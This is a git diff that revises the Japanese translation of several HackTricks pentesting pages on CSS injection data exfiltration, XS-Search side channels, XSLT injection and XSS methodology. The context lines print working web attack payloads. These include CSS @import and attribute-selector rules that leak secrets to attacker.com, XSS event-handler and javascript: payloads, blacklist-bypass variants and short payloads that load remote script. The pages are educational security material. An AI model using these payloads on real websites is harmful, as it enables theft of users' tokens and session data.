 ```html
 <style>
@@ -52,26 +52,26 @@ background: url(/m);
 <input name="mytoken" value="1337" />
 <input name="myname" value="gareth" />
 ```
-この技術を次の**@import**技術と組み合わせることで、**blind pages with** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**から多くの**infoをCSSインジェクションを使用して抽出することが可能です。**
+この技術を次の**@import**技術と組み合わせることで、**[**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**を使用して、盲目的なページから多くの**情報を流出させる**ことが可能です。**
 
 ### @import
 
-前の技術にはいくつかの欠点があり、前提条件を確認する必要があります。あなたは**被害者に複数のリンクを送信できる必要がある**か、**CSSインジェクション脆弱ページをiframeできる必要があります**。
+前の技術にはいくつかの欠点があり、前提条件を確認する必要があります。あなたは**被害者に複数のリンクを送信できる必要がある**か、**CSSインジェクション脆弱ページをiframeで表示できる必要があります**。
 
 しかし、**CSS `@import`**を使用して技術の質を向上させる別の巧妙な技術があります。
 
 これは最初に[**Pepe Vila**](https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf)によって示され、次のように機能します：
 
-同じページを何度も異なるペイロードで読み込む代わりに（前の方法のように）、**ページを一度だけ攻撃者のサーバーへのインポートで読み込む**ことにします（これが被害者に送信するペイロードです）：
+同じページを何度も異なるペイロードで読み込む代わりに（前の技術のように）、**ページを一度だけ攻撃者のサーバーへのインポートで読み込む**ことにします（これが被害者に送信するペイロードです）：
 ```css
 @import url("//attacker.com:5001/start?");
 ```
 1. インポートは**攻撃者からのCSSスクリプトを受け取る**ことになり、**ブラウザはそれを読み込む**。
 2. 攻撃者が送信するCSSスクリプトの最初の部分は**再び攻撃者のサーバーへの別の`@import`**です。
 1. 攻撃者のサーバーはこのリクエストにはまだ応答しません。なぜなら、いくつかの文字を漏らし、その後このインポートにペイロードを応答して次の文字を漏らしたいからです。
-3. ペイロードの2番目で大きな部分は**属性セレクタ漏洩ペイロード**になります。
+3. ペイロードの2番目でより大きな部分は**属性セレクタ漏洩ペイロード**になります。
 1. これにより、攻撃者のサーバーに**秘密の最初の文字と最後の文字**が送信されます。
-4. 攻撃者のサーバーが**秘密の最初と最後の文字**を受け取ると、**ステップ2で要求されたインポートに応答します**。
+4. 攻撃者のサーバーが**秘密の最初と最後の文字を受け取ると、**ステップ2で要求されたインポートに**応答します**。
 1. 応答は**ステップ2、3、4と全く同じ**ですが、今回は**秘密の2番目の文字と次の最後の文字を見つけようとします**。
 
 攻撃者は**秘密を完全に漏らすまでそのループを続けます**。
@@ -79,7 +79,7 @@ background: url(/m);
 元の[**Pepe Vilaのコードをここで利用できます**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231)またはほぼ[**同じコードですがコメント付きのものをこちらで見つけることができます**](./#css-injection)。
 
 > [!NOTE]
-> スクリプトは毎回2文字（最初からと最後から）を発見しようとします。なぜなら、属性セレクタは次のようなことを可能にするからです：
+> スクリプトは毎回2文字を発見しようとします（最初からと最後から）なぜなら、属性セレクタは次のようなことを可能にするからです：
 >
 > ```css
 > /* value^=  値の始まりに一致させるため */
@@ -104,7 +104,7 @@ background: url(/m);
 **CSSセレクタ**を使用してDOMの部分にアクセスする他の方法：
 
 - **`.class-to-search:nth-child(2)`**: これはDOM内のクラス「class-to-search」を持つ2番目のアイテムを検索します。
-- **`:empty`**セレクタ：例えば、[**この解説**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**で使用されています**：
+- **`:empty`**セレクタ: 例えば、[**この書き込み**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**で使用されます**：
 
 ```css
 [role^="img"][aria-label="1"]:empty {
@@ -112,11 +112,11 @@ background-image: url("YOUR_SERVER_URL?1");
 }
 ```
 
-### エラーに基づくXS-Search
+### エラーベースのXS-Search
 
-**参考文献:** [CSSベースの攻撃：@font-faceのunicode-rangeを悪用する](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html)、[エラーに基づくXS-Search PoC by @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
+**参考文献:** [CSSベースの攻撃: @font-faceのunicode-rangeを悪用する](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html)、[エラーベースのXS-Search PoC by @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
 
-全体の意図は、**制御されたエンドポイントからカスタムフォントを使用し、指定されたリソース（`favicon.ico`）が読み込まれない場合にのみ、**テキスト（この場合は'A'）がこのフォントで表示されることを保証することです**。
+全体の意図は、**制御されたエンドポイントからカスタムフォントを使用し、指定されたリソース（`favicon.ico`）が読み込まれない場合にのみ、**テキスト（この場合は「A」）がこのフォントで表示されることを保証することです**。
 ```html
 <!DOCTYPE html>
 <html>
@@ -152,7 +152,7 @@ font-family: "poc";
 
 ### スクロールテキストフラグメントのスタイリング
 
-**`:target`**擬似クラスは、**URLフラグメント**によってターゲットにされた要素を選択するために使用されます。これは、[CSS Selectors Level 4 specification](https://drafts.csswg.org/selectors-4/#the-target-pseudo)で指定されています。`::target-text`は、テキストがフラグメントによって明示的にターゲットにされない限り、要素に一致しないことを理解することが重要です。
+**`:target`**擬似クラスは、**URLフラグメント**によってターゲットにされた要素を選択するために使用されます。これは、[CSS Selectors Level 4 specification](https://drafts.csswg.org/selectors-4/#the-target-pseudo)で指定されています。`::target-text`は、テキストがフラグメントによって明示的にターゲットにされない限り、いかなる要素とも一致しないことを理解することが重要です。
 
 攻撃者が**スクロールテキスト**フラグメント機能を悪用する際にセキュリティ上の懸念が生じます。これにより、HTMLインジェクションを通じて自分のサーバーからリソースを読み込むことで、特定のテキストがウェブページに存在するかどうかを確認できます。この方法は、次のようなCSSルールを注入することを含みます:
 ```css
@@ -170,7 +170,7 @@ http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:
 
 1. **制約されたSTTFマッチング**: Scroll-to-text Fragment (STTF) は単語や文のみをマッチさせるように設計されており、任意の秘密やトークンを漏洩させる能力を制限しています。
 2. **トップレベルのブラウジングコンテキストへの制限**: STTFはトップレベルのブラウジングコンテキストでのみ機能し、iframe内では機能しないため、いかなる悪用の試みもユーザーにとってより目立つものになります。
-3. **ユーザーのアクティベーションの必要性**: STTFは動作するためにユーザーのアクティベーションジェスチャーを必要とし、つまり悪用はユーザーが開始したナビゲーションを通じてのみ可能です。この要件は、ユーザーのインタラクションなしに攻撃が自動化されるリスクを大幅に軽減します。それにもかかわらず、ブログ投稿の著者は、攻撃の自動化を容易にする特定の条件やバイパス（例：ソーシャルエンジニアリング、一般的なブラウザ拡張とのインタラクション）を指摘しています。
+3. **ユーザーのアクティベーションの必要性**: STTFは動作するためにユーザーのアクティベーションジェスチャーを必要とし、つまり悪用はユーザーが開始したナビゲーションを通じてのみ可能です。この要件は、ユーザーのインタラクションなしに攻撃が自動化されるリスクを大幅に軽減します。それにもかかわらず、ブログ投稿の著者は、攻撃の自動化を容易にする特定の条件やバイパス（例：ソーシャルエンジニアリング、一般的なブラウザ拡張機能とのインタラクション）を指摘しています。
 
 これらのメカニズムと潜在的な脆弱性を認識することは、ウェブセキュリティを維持し、そのような悪用的戦術から守るための鍵です。
 
@@ -212,7 +212,7 @@ htm
 
 **参考文献:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
 
-説明されている技術は、フォントリガチャを利用してノードからテキストを抽出し、幅の変化を監視することを含みます。このプロセスは、いくつかのステップで構成されています。
+この技術は、フォントリガチャを利用してノードからテキストを抽出し、幅の変化を監視することを含みます。プロセスは以下のいくつかのステップで構成されています。
 
 1. **カスタムフォントの作成**:
 
@@ -247,7 +247,7 @@ background: url(http://attacker.com/?leak);
 
 4. **最適化**:
 - 現在の初期化方法は`<meta refresh=...`を使用しており、最適ではありません。
-- より効率的なアプローチは、CSS `@import`トリックを使用して、エクスプロイトのパフォーマンスを向上させることができます。
+- より効率的なアプローチは、CSS `@import`トリックを利用して、エクスプロイトのパフォーマンスを向上させることができます。
 
 ### テキストノードの抽出 (II): デフォルトフォントを使用した文字セットの漏洩（外部アセットを必要としない） <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
 
@@ -255,7 +255,7 @@ background: url(http://attacker.com/?leak);
 
 このトリックはこの[**Slackersスレッド**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what_can_we_do_with_single_css_injection/)で公開されました。テキストノードで使用される文字セットは、ブラウザにインストールされている**デフォルトフォント**を使用して漏洩できます：外部またはカスタムフォントは必要ありません。
 
-この概念は、アニメーションを利用して`div`の幅を徐々に拡大し、1文字ずつテキストの「サフィックス」部分から「プレフィックス」部分に移行させることに基づいています。このプロセスは、テキストを2つのセクションに分割します。
+この概念は、アニメーションを利用して`div`の幅を徐々に拡大し、1文字ずつテキストの「サフィックス」部分から「プレフィックス」部分に移行させることに基づいています。このプロセスは、テキストを2つのセクションに効果的に分割します。
 
 1. **プレフィックス**: 最初の行。
 2. **サフィックス**: 次の行。
@@ -724,15 +724,15 @@ src: url(/static/bootstrap.min.css?q=1);
 unicode-range: U+0041;
 }
 ```
-一致する場合、**フォントは `/static/bootstrap.min.css?q=1` から読み込まれます**。成功裏に読み込まれることはありませんが、**ブラウザはそれをキャッシュするはずです**。キャッシュがなくても、**304 not modified** メカニズムがあるため、**レスポンスは他のものよりも速くなるはずです**。
+もし一致があれば、**フォントは `/static/bootstrap.min.css?q=1` から読み込まれます**。成功裏に読み込まれることはありませんが、**ブラウザはそれをキャッシュするはずです**。キャッシュがなくても、**304 not modified** メカニズムがあるため、**レスポンスは他のものよりも速くなるはずです**。
 
-ただし、キャッシュされたレスポンスと非キャッシュのレスポンスの時間差が十分でない場合、これは役に立ちません。たとえば、著者は次のように述べています：ただし、テストの結果、最初の問題は速度があまり変わらないことであり、2番目の問題はボットが `disk-cache-size=1` フラグを使用していることで、これは本当に考慮されています。
+しかし、キャッシュされたレスポンスと非キャッシュのレスポンスの時間差が十分でない場合、これは役に立ちません。例えば、著者は次のように述べています：しかし、テストの結果、最初の問題は速度があまり変わらないことであり、二つ目の問題はボットが `disk-cache-size=1` フラグを使用していることで、これは本当に考慮されています。
 
-### テキストノードの流出 (III): 数百のローカル「フォント」から文字セットをタイミングで流出させる（外部アセットを必要としない） <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
+### テキストノードの抽出 (III)：数百のローカル「フォント」から文字セットをタイミングで漏洩させる（外部アセットを必要としない） <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
 
 **参考:** これは [この書き込みの中での失敗した解決策として言及されています](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
 
-この場合、一致が発生したときに**同じオリジンから数百の偽フォントを読み込むようにCSSを指定できます**。この方法で、**かかる時間を測定**し、文字が表示されるかどうかを確認できます。
+この場合、一致が発生したときに**同じオリジンから数百の偽フォントを読み込むようにCSSを指定できます**。この方法で、**かかる時間を測定**し、文字が現れるかどうかを次のようなもので確認できます：
 ```css
 @font-face {
 font-family: "A1";
diff --git a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
index 92c06969d..edb1b776f 100644
--- a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
+++ b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
@@ -1,25 +1,25 @@
-# イベントループブロッキング + レイジーイメージ
+# イベントループブロッキング + レイジー画像
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In [**this exploit**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) mixes the **lazy image side channel** technique through a HTML injection with kind of **event loop blocking technique** to leak chars.
+[**このエクスプロイト**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45)では、[**@aszx87410**](https://twitter.com/aszx87410)が**レイジー画像サイドチャネル**技術をHTMLインジェクションと組み合わせて、**イベントループブロッキング技術**を使用して文字を漏洩させます。
 
-This is a **different exploit for the CTF chall** that was already commented in the following page. take a look for more info about the challenge:
+これは、次のページで既にコメントされた**CTFチャレンジ**のための**異なるエクスプロイト**です。チャレンジに関する詳細情報を確認してください：
 
 {{#ref}}
 connection-pool-example.md
 {{#endref}}
 
-The idea behind this exploit is:
+このエクスプロイトの背後にあるアイデアは次のとおりです：
 
 - 投稿はアルファベット順に読み込まれます
-- **攻撃者**は**"A"**で始まる**投稿**を**注入**でき、その後に大きな**`<canvas`**のような**HTMLタグ**が画面のほとんどを占め、いくつかの最終的な**`<img lazy`タグ**が読み込まれます。
-- もし**"A"**の代わりに**攻撃者が同じ投稿を"z"で始まるように注入**した場合、**フラグ**を持つ**投稿**が**最初に**表示され、その後に**注入された**投稿が初期の"z"と**大きな****canvas**と共に表示されます。フラグを持つ投稿が最初に表示されたため、最初のcanvasは画面全体を占め、最終的な**`<img lazy`**タグが注入されても**画面に表示されない**ため、**読み込まれません**。
+- **攻撃者**は**"A"**で始まる**投稿**を**インジェクト**でき、その後に大きな**`<canvas`**のような**HTMLタグ**が画面のほとんどを占め、いくつかの最終的な**`<img lazy`タグ**が読み込まれます。
+- **攻撃者が"A"の代わりに同じ投稿を"z"で始めてインジェクト**した場合、**フラグ**を含む**投稿**が**最初に**表示され、その後に**インジェクトされた**投稿が初期の"z"と**大きな****canvas**と共に表示されます。フラグを含む投稿が最初に表示されたため、最初のcanvasは画面全体を占め、最終的な**`<img lazy`**タグが画面に**表示されない**ため、**読み込まれません**。
 - その後、**ボットが**ページに**アクセスしている間**、**攻撃者**は**フェッチリクエスト**を**送信**します。&#x20;
-- 投稿に注入された**画像**が**読み込まれている**場合、これらの**フェッチ**リクエストは**長く**かかるため、攻撃者は**投稿がフラグの前にある**ことを知ります（アルファベット順に）。
-- もし**フェッチ**リクエストが**速い**場合、それは**投稿**が**フラグの後に**あることを意味します。
+- 投稿にインジェクトされた**画像**が**読み込まれている**場合、これらの**フェッチ**リクエストは**長く**かかるため、攻撃者は**投稿がフラグの前にある**ことを知ります（アルファベット順に）。
+- **フェッチ**リクエストが**速い**場合、それは**投稿**が**フラグの後に**あることを意味します。
 
-Let's check the code:
+コードを確認しましょう：
 ```html
 <!DOCTYPE html>
 <html>
diff --git a/src/pentesting-web/xs-search/javascript-execution-xs-leak.md b/src/pentesting-web/xs-search/javascript-execution-xs-leak.md
index 3e22b3f64..f9d84f876 100644
--- a/src/pentesting-web/xs-search/javascript-execution-xs-leak.md
+++ b/src/pentesting-web/xs-search/javascript-execution-xs-leak.md
@@ -20,7 +20,7 @@ window.parent.foo()
 res.send(page)
 })
 ```
-前の `/guessing` ページに対して各可能性をテストするための iframe を生成するメインページ
+前の `/guessing` ページに対して各可能性をテストするために iframe を生成するメインページ
 ```html
 <html>
 <head>
diff --git a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
index c378e798d..aa901801b 100644
--- a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
+++ b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
@@ -4,7 +4,7 @@
 
 **Exploit taken from [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**
 
-このチャレンジでは、ユーザーは何千もの文字を送信でき、フラグが含まれている場合、文字がボットに返されました。したがって、大量の文字を送信することで、攻撃者はフラグが送信された文字列に含まれているかどうかを測定できました。
+このチャレンジでは、ユーザーは数千の文字を送信でき、フラグが含まれている場合、文字がボットに返されました。したがって、大量の文字を送信することで、攻撃者はフラグが送信された文字列に含まれているかどうかを測定できました。
 
 > [!WARNING]
 > 最初はオブジェクトの幅と高さを設定しませんでしたが、後でデフォルトのサイズが読み込み時間に違いをもたらすには小さすぎるため、重要であることがわかりました。
diff --git a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
index 40b14305e..08fb41249 100644
--- a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
+++ b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
@@ -4,7 +4,7 @@
 
 ## 基本情報
 
-XSLTは、XMLドキュメントを異なるフォーマットに変換するために使用される技術です。バージョン1、2、3の3つのバージョンがあり、バージョン1が最も一般的に利用されています。変換プロセスは、サーバー上またはブラウザ内で実行できます。
+XSLTは、XMLドキュメントを異なるフォーマットに変換するために使用される技術です。バージョンは1、2、3の3つがあり、バージョン1が最も一般的に利用されています。変換プロセスは、サーバー上またはブラウザ内で実行できます。
 
 最も頻繁に使用されるフレームワークには以下が含まれます：
 
@@ -372,11 +372,11 @@ version="1.0">
 - Check [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection)
 - Check [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
 
-## **ブルートフォース検出リスト**
+## **Brute-Force Detection List**
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %}
 
-## **参考文献**
+## **References**
 
 - [XSLT_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT_SSRF.pdf)\\
 - [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf)\\
diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md
index 8bbca4caf..f79fef248 100644
--- a/src/pentesting-web/xss-cross-site-scripting/README.md
+++ b/src/pentesting-web/xss-cross-site-scripting/README.md
@@ -5,7 +5,7 @@
 1. **あなたが制御する任意の値** (_パラメータ_、_パス_、_ヘッダー_？、_クッキー_？) がHTMLに**反映**されているか、**JS**コードによって**使用**されているかを確認します。
 2. **反映されている/使用されているコンテキスト**を見つけます。
 3. **反映されている場合**
-1. **使用できる記号**を確認し、それに応じてペイロードを準備します：
+1. **使用できる記号を確認**し、それに応じてペイロードを準備します：
 1. **生のHTML**内で：
 1. 新しいHTMLタグを作成できますか？
 2. `javascript:`プロトコルをサポートするイベントや属性を使用できますか？
@@ -23,7 +23,7 @@
 3. テンプレートリテラル \`\` に入力がありますか？
 4. 保護を回避できますか？
 4. 実行されているJavaScript **関数**
-1. 実行する関数の名前を指定できます。例：`?callback=alert(1)`
+1. 実行する関数の名前を指定できます。例： `?callback=alert(1)`
 4. **使用されている場合**：
 1. **DOM XSS**を悪用できるかもしれません。あなたの入力がどのように制御されているか、そしてあなたの**制御された入力がどのシンクで使用されているか**に注意してください。
 
@@ -35,7 +35,7 @@ debugging-client-side-js.md
 
 ## 反映された値
 
-XSSを成功裏に悪用するために最初に見つける必要があるのは、**あなたが制御する値がウェブページに反映されている**ことです。
+XSSを成功裏に悪用するために最初に見つけるべきことは、**あなたが制御する値がウェブページに反映されていること**です。
 
 - **中間的に反映された**：パラメータの値やパスがウェブページに反映されていることがわかった場合、**反映されたXSS**を悪用できるかもしれません。
 - **保存されて反映された**：あなたが制御する値がサーバーに保存され、ページにアクセスするたびに反映される場合、**保存されたXSS**を悪用できるかもしれません。
@@ -43,7 +43,7 @@ XSSを成功裏に悪用するために最初に見つける必要があるの
 
 ## コンテキスト
 
-XSSを悪用しようとする際に最初に知っておくべきことは、**あなたの入力がどこに反映されているか**です。コンテキストに応じて、異なる方法で任意のJSコードを実行できるようになります。
+XSSを悪用しようとする際に最初に知っておくべきことは、**あなたの入力がどこに反映されているか**です。コンテキストによって、異なる方法で任意のJSコードを実行できるようになります。
 
 ### 生のHTML
 
@@ -54,9 +54,9 @@ XSSを悪用しようとする際に最初に知っておくべきことは、**
 
 あなたの入力がタグの属性の値内に反映されている場合、次のことを試みることができます：
 
-1. **属性とタグから抜け出す**（その後、生のHTMLにいることになります）新しいHTMLタグを作成して悪用します：`"><img [...]`
-2. **属性からは抜け出せるがタグからは抜け出せない**場合（`>`がエンコードまたは削除されている）、タグに応じてJSコードを実行する**イベント**を作成できるかもしれません：`" autofocus onfocus=alert(1) x="`
-3. **属性から抜け出せない**場合（`"`がエンコードまたは削除されている）、あなたの値が反映されている**属性**に応じて、**すべての値を制御しているか、一部だけを制御しているか**によって悪用できるかもしれません。**例えば**、`onclick=`のようなイベントを制御している場合、クリックされたときに任意のコードを実行させることができます。もう一つの興味深い**例**は、`href`属性で、`javascript:`プロトコルを使用して任意のコードを実行できます：**`href="javascript:alert(1)"`**
+1. **属性とタグから抜け出す**（その後、生のHTMLにいることになります）新しいHTMLタグを作成して悪用する：`"><img [...]`
+2. **属性からは抜け出せるがタグからは抜け出せない**場合（`>`がエンコードまたは削除されている）、タグに応じてJSコードを実行する**イベントを作成**できるかもしれません：`" autofocus onfocus=alert(1) x="`
+3. **属性から抜け出せない**場合（`"`がエンコードまたは削除されている）、あなたの値が反映されている**属性**によって、**すべての値を制御しているか、一部だけを制御しているか**に応じて悪用できるかもしれません。**例えば**、`onclick=`のようなイベントを制御している場合、クリックされたときに任意のコードを実行させることができます。もう一つの興味深い**例**は、`href`属性で、`javascript:`プロトコルを使用して任意のコードを実行できます：**`href="javascript:alert(1)"`**
 4. あなたの入力が「**悪用できないタグ**」内に反映されている場合、脆弱性を悪用するために**`accesskey`**トリックを試みることができます（これを悪用するには何らかの社会工学が必要です）：**`" accesskey="x" onclick="alert(1)" x="`**
 
 クラス名を制御する場合のAngularによるXSSの奇妙な例：
@@ -65,17 +65,17 @@ XSSを悪用しようとする際に最初に知っておくべきことは、**
 <strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
 </div>
 ```
-### Inside JavaScript code
+### JavaScriptコード内
 
-この場合、あなたの入力はHTMLページの**`<script> [...] </script>`**タグ、`.js`ファイル内、または**`javascript:`**プロトコルを使用した属性内に反映されます：
+この場合、あなたの入力はHTMLページの**`<script> [...] </script>`**タグの間、`.js`ファイル内、または**`javascript:`**プロトコルを使用した属性内に反映されます：
 
-- **`<script> [...] </script>`**タグの間に反映されている場合、たとえあなたの入力がどんな種類の引用符の中にあっても、`</script>`を注入してこのコンテキストから**脱出**しようとすることができます。これは、**ブラウザが最初にHTMLタグを解析**し、その後にコンテンツを解析するため、あなたが注入した`</script>`タグがHTMLコード内にあることに気づかないからです。
-- **JS文字列内**に反映されていて、最後のトリックが機能しない場合は、文字列から**退出**し、コードを**実行**し、JSコードを**再構築**する必要があります（エラーがある場合は実行されません）：
+- **`<script> [...] </script>`**タグの間に反映されている場合、たとえあなたの入力がどんな種類の引用符の中にあっても、`</script>`を注入してこのコンテキストから**脱出**しようとすることができます。これは、**ブラウザが最初にHTMLタグを解析**し、その後にコンテンツを解析するため、あなたが注入した`</script>`タグがHTMLコード内にあることに気付かないからです。
+- **JS文字列内**に反映されていて、最後のトリックが機能しない場合は、文字列から**脱出**し、コードを**実行**し、JSコードを**再構築**する必要があります（エラーがある場合は実行されません）：
 - `'-alert(1)-'`
 - `';-alert(1)//`
 - `\';alert(1)//`
 - テンプレートリテラル内に反映されている場合、`${ ... }`構文を使用して**JS式を埋め込む**ことができます： `` var greetings = `Hello, ${alert(1)}` ``
-- **Unicodeエンコード**は**有効なjavascriptコード**を書くために機能します：
+- **Unicodeエンコード**は**有効なJavaScriptコード**を書くために機能します：
 ```javascript
 alert(1)
 alert(1)
@@ -83,7 +83,7 @@ alert(1)
 ```
 #### Javascript Hoisting
 
-Javascript Hoistingは、**関数、変数、またはクラスを使用した後に宣言する機会を指し、未宣言の変数や関数を使用するXSSのシナリオを悪用することができます。**\
+Javascript Hoistingは、**関数、変数、またはクラスを使用した後に宣言する機会を指し、未宣言の変数や関数を使用するXSSのシナリオを悪用できるようにします。**\
 **詳細については、次のページを確認してください:**
 
 {{#ref}}
@@ -92,15 +92,15 @@ js-hoisting.md
 
 ### Javascript Function
 
-いくつかのウェブページには、**実行する関数の名前をパラメータとして受け入れるエンドポイントがあります**。一般的に見られる例は、`?callback=callbackFunc`のようなものです。
+いくつかのウェブページには、**実行する関数の名前をパラメータとして受け入れるエンドポイントがあります**。一般的な例として、`?callback=callbackFunc`のようなものがあります。
 
 ユーザーによって直接提供された何かが実行されようとしているかどうかを確認する良い方法は、**パラメータの値を変更すること**（例えば「Vulnerable」に）で、コンソールで次のようなエラーを探すことです:
 
 ![](<../../images/image (711).png>)
 
-もし脆弱であれば、**値を送信するだけでアラートをトリガーすることができるかもしれません: **`?callback=alert(1)`**。ただし、これらのエンドポイントは、**内容を検証して、文字、数字、ドット、アンダースコアのみを許可することが非常に一般的です（**`[\w\._]`**）。**
+脆弱性がある場合、**値を送信するだけでアラートをトリガーできる**かもしれません: **`?callback=alert(1)`**。ただし、これらのエンドポイントは**内容を検証して、文字、数字、ドット、アンダースコアのみを許可することが非常に一般的です**（**`[\w\._]`**）。
 
-しかし、その制限があっても、いくつかのアクションを実行することは依然として可能です。これは、有効な文字を使用して**DOM内の任意の要素にアクセスすることができるからです**:
+しかし、その制限があっても、いくつかのアクションを実行することは依然として可能です。これは、有効な文字を使用して**DOM内の任意の要素にアクセスできるためです**:
 
 ![](<../../images/image (747).png>)
 
@@ -124,7 +124,7 @@ some-same-origin-method-execution.md
 
 ### DOM
 
-**攻撃者によって制御されたデータ**を**安全でない**方法で使用している**JSコード**があります。例えば、`location.href`。攻撃者は、これを悪用して任意のJSコードを実行することができます。
+**JSコード**が、攻撃者によって制御される**データ**（例: `location.href`）を**安全でない**方法で使用しています。攻撃者は、これを悪用して任意のJSコードを実行することができます。
 
 {{#ref}}
 dom-xss.md
@@ -132,7 +132,7 @@ dom-xss.md
 
 ### **ユニバーサルXSS**
 
-この種のXSSは**どこにでも**見つけることができます。これは、Webアプリケーションのクライアントの悪用だけでなく、**あらゆる****コンテキスト**に依存します。この種の**任意のJavaScript実行**は、**RCE**を取得したり、クライアントやサーバーの**任意のファイルを読み取ったり**するために悪用されることさえあります。\
+この種のXSSは**どこにでも**見つけることができます。これは、Webアプリケーションのクライアントのエクスプロイトだけでなく、**任意の** **コンテキスト**にも依存します。この種の**任意のJavaScript実行**は、**RCE**を取得したり、クライアントやサーバーの**任意の** **ファイル**を**読み取ったり**するために悪用されることさえあります。\
 いくつかの**例**：
 
 {{#ref}}
@@ -150,7 +150,7 @@ server-side-xss-dynamic-pdf.md
 ## 生のHTML内に注入
 
 あなたの入力が**HTMLページ内に反映される**場合、またはこのコンテキストでHTMLコードをエスケープして注入できる場合、最初に行うべきことは、`<`を悪用して新しいタグを作成できるかどうかを確認することです: その**文字**を**反映**させて、それが**HTMLエンコード**されているか、**削除**されているか、または**変更なしで反映**されているかを確認してください。**最後のケースでのみ、このケースを悪用できるでしょう**。\
-この場合も、**Client Side Template Injection**を考慮してください[**Client Side Template Injection**](../client-side-template-injection-csti.md)**。**\
+この場合も、[**クライアントサイドテンプレートインジェクション**](../client-side-template-injection-csti.md)**を念頭に置いてください。**\
 &#xNAN;_**注: HTMLコメントは、\*\*\*\*\*\***&#x20;\***\*`-->`\*\***&#x20;\***\*または\*\*\*\*\*\***`--!>`\*\**で閉じることができます。_
 
 この場合、ブラックリスト/ホワイトリストが使用されていない場合、次のようなペイロードを使用できます:
@@ -176,7 +176,7 @@ alert(1)
 ```
 ### ブラックリストバイパス
 
-もし何らかのブラックリストが使用されている場合、いくつかの簡単なトリックでバイパスを試みることができます：
+もし何らかのブラックリストが使用されている場合、いくつかの簡単なトリックを使ってバイパスを試みることができます：
 ```javascript
 //Random capitalization
 <script> --> <ScrIpT>
@@ -228,29 +228,29 @@ onerror=alert`1`
 ```
 ### 長さバイパス（小さなXSS）
 
-> [!NOTE] > **異なる環境のためのより小さなXSS** ペイロードは [**こちら**](https://github.com/terjanq/Tiny-XSS-Payloads) と [**こちら**](https://tinyxss.terjanq.me) で見つけることができます。
+> [!NOTE] > **異なる環境のためのより小さなXSS** ペイロードは [**ここにあります**](https://github.com/terjanq/Tiny-XSS-Payloads) と [**ここにあります**](https://tinyxss.terjanq.me)。
 ```html
 <!-- Taken from the blog of Jorge Lajara -->
 <svg/onload=alert``> <script src=//aa.es> <script src=//℡㏛.pw>
 ```
-最後のものは、5つに展開される2つのUnicode文字を使用しています: telsr\
+最後のものは、5に展開される2つのUnicode文字を使用しています: telsr\
 これらの文字の詳細は[こちら](https://www.unicode.org/charts/normalization/)で見つけることができます。\
 どの文字が分解されているかを確認するには[こちら](https://www.compart.com/en/unicode/U+2121)をチェックしてください。
 
 ### Click XSS - Clickjacking
 
-脆弱性を悪用するために**ユーザーにリンクやフォームをクリックさせる**必要がある場合、[**Clickjackingを悪用する**](../clickjacking.md#xss-clickjacking)ことを試みることができます（ページが脆弱な場合）。
+脆弱性を悪用するために**ユーザーがリンクやフォームをクリックする必要がある**場合、[**Clickjackingを悪用する**](../clickjacking.md#xss-clickjacking)ことを試みることができます（ページが脆弱な場合）。
 
 ### 不可能 - ダングリングマークアップ
 
